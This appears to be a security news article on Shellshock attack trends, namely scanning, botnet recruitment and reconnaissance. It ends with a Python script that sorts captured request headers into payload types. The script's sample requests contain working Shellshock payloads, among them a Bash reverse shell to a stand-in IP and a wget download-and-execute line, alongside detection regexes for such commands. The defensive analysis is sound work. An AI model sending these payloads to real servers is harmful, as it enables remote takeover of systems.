Making Sense Of Shellshock Attack Chaos

Attacks against the Bash bug increase in volume and variety, with an emphasis on information gathering and botnet building.

As security teams reel from last week's Shellshock headlines, attackers have been quick to seize on the vulnerability, and exploits have rapidly come out of the woodwork. Researchers immediately warned that this flaw in Bash would likely have a far worse impact than Heartbleed, given its severity (it lets an attacker run arbitrary commands on an exposed system) and Bash's pervasive presence across Linux and UNIX systems. The attacks now being observed are starting to sharpen that picture of the threat.

"Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it," according to a post by Johannes Ullrich, director of the SANS Internet Storm Center. Ullrich describes several distinct patterns, including vulnerability checks that plant the payload in multiple HTTP headers and simpler checks that carry it in a custom User-Agent string.

According to research Incapsula released Friday, the company recorded 17,400 attacks against its WAF installed base in just 24 hours, aimed at approximately 1,800 domains. The attacks originated from 400 unique IP addresses, more than half of them in China or the US. Researchers have noted not only rising attack volume but also a growing variety of ways attackers are leveraging the Bash bug to commandeer web servers.

For example, Kaspersky Lab's Stefan Ortloff detailed two attacks. One, a reverse-connect shell, will "just create a new instance of bash and redirect it to a remote server listening on a specific TCP port." The other uses specially crafted HTTP requests to start installing Linux backdoors on victims' servers.

However, much of the early criminal activity seems to center on the bad guys building up their botnets using the newly discovered vulnerability.

"What we are seeing here are hackers using existing botnets to create new ones: running automated scripts from compromised servers to add more hijacked machines to their 'flock,'" Ofer Gayer, a researcher for Incapsula, explained in a blog post. "During the last 24 hours we saw several botnet shepherds using repurposed DDoS bots in an attempt to exploit the Shellshock vulnerability to gain server access."

Researchers in Italy have reported the same pattern: a Linux botnet called wopbot went to work last week DDoSing Akamai's content delivery network and running large-scale scans against US Department of Defense address space for "brute force attack purposes," according to researchers at Kaspersky. Researchers at FireEye, meanwhile, ran down a laundry list of exploitation techniques already seen in Shellshock traffic, including automated click fraud, password stealing, and backdoor installation, with payloads ranging from reverse-shell Perl scripts to UDP flood tools and IRC-based DDoS bots.

"The Shellshock traffic we have been able to observe is still quite chaotic," writes James Bennett of FireEye. "It is largely characterized by high volume automated scans and PoC-like exploit scripts."

Meanwhile, researchers at Trend Micro wrote this morning of an attack they followed against a Chinese financial institution that should give security teams pause. Attackers in that instance were simply trying to see whether several IPs owned by the institution were vulnerable to the Shellshock bug.

"Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to use the command '/bin/uname -a.' The command 'uname' displays system information, including the OS platform, the machine type, and the processor information," Trend researchers wrote. "At first glance, retrieving system information might seem harmless. But as we mentioned before, the information-gathering could possibly be a sign of preparation for more damaging routines."

This kind of early probing could be laying the groundwork for future attacks, and it does not look like an isolated incident of reconnaissance.
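The probes described above, from Ullrich's multi-header vulnerability checks and the reverse-connect shell Ortloff describes to the `/bin/uname -a` reconnaissance Trend Micro observed, all share one shape on the wire: an HTTP header whose value starts with a Bash function definition and carries the real command after the closing brace. The Python below is an added example written for this article, not code from SANS, Kaspersky, FireEye or Trend Micro; it triages such headers into the behaviours the reports describe. The header names, sample requests, IP addresses and classification rules are constructed for illustration, and the category heuristics are assumptions, not any vendor's signatures.

```python
"""Triage Shellshock payloads carried in HTTP request headers.

Added example for this article, not code from SANS, Kaspersky, FireEye or
Trend Micro. Header names, requests, addresses and rules are constructed.
"""
import re
from urllib.parse import unquote

# Vulnerable Bash treated any imported environment variable whose value began
# with "() {" as a function definition and kept parsing after the closing
# brace, so the text after "};" ran as a command the moment a CGI script
# spawned Bash. Under CGI, request headers become such variables
# (User-Agent -> HTTP_USER_AGENT, Cookie -> HTTP_COOKIE, ...), which is why
# the payload shows up in headers. The regex mirrors Bash's own
# "does the value start with () {" test and captures the trailing command.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{[^}]*\}\s*;?\s*(?P<cmd>.*)$", re.DOTALL)

# Ordered heuristics (assumed for this example, not a vendor signature set)
# mapping the trailing command to the behaviours the reports describe.
# First match wins, so the most specific behaviour is listed first.
RULES = (
    ("reverse_shell",    re.compile(r"/dev/tcp/|\bnc\b[^;|]*-e|\bbash\s+-i\b")),
    ("download_and_run", re.compile(r"\b(wget|curl)\b.*[;|&]\s*(sh|bash|perl|python|chmod)\b")),
    ("recon",            re.compile(r"\buname\b|\bwhoami\b|\bid\b|/etc/passwd")),
    ("probe",            re.compile(r"\becho\b|\bping\b|\bsleep\b")),
)


def classify_header(value):
    """Return (category, command) if value carries a Shellshock payload, else None."""
    m = SHELLSHOCK_RE.match(unquote(value))
    if m is None:
        return None
    cmd = m.group("cmd").strip()
    for category, pattern in RULES:
        if pattern.search(cmd):
            return category, cmd
    return "unknown_payload", cmd


def classify_request(headers):
    """Check every header of one request; return [(header, category, command), ...]."""
    hits = []
    for name, value in headers.items():
        result = classify_header(value)
        if result is not None:
            hits.append((name,) + result)
    return hits


def summarize(requests):
    """Tally payload categories across many requests, as a WAF report would."""
    counts = {}
    for headers in requests:
        for _name, category, _cmd in classify_request(headers):
            counts[category] = counts.get(category, 0) + 1
    return counts


# Constructed sample requests modelled on the traffic the article describes.
SAMPLE_REQUESTS = [
    {"Host": "www.example.com",
     "User-Agent": '() { :;}; echo; /bin/bash -c "echo vulnerable"'},
    {"Host": "www.example.com",
     "Cookie": "() { :;}; /bin/bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"},
    {"Host": "www.example.com",
     "Referer": "() { :; }; /usr/bin/wget http://203.0.113.5/x -O /tmp/x; chmod +x /tmp/x; /tmp/x"},
    {"Host": "www.example.com",
     "User-Agent": "() { :;}; /bin/uname -a"},
    {"Host": "www.example.com",
     "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0",
     "X-Debug": "function() { return 1; }"},  # similar-looking text, not a Bash function export
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify_request(req))
    print(summarize(SAMPLE_REQUESTS))
```

The anchored `^\s*\(\)\s*\{` matters: Bash only imported values that started with `() {`, so text that merely contains braces later (the `X-Debug` value above) is not a payload, and an unanchored check would flood a WAF with false positives. The heuristics are a triage aid for sorting captured traffic, not a blocking rule; a real deployment would also inspect the request line and query string, since CGI exports those too, and would treat the "probe" and "recon" categories as the early warning Trend Micro describes rather than as noise.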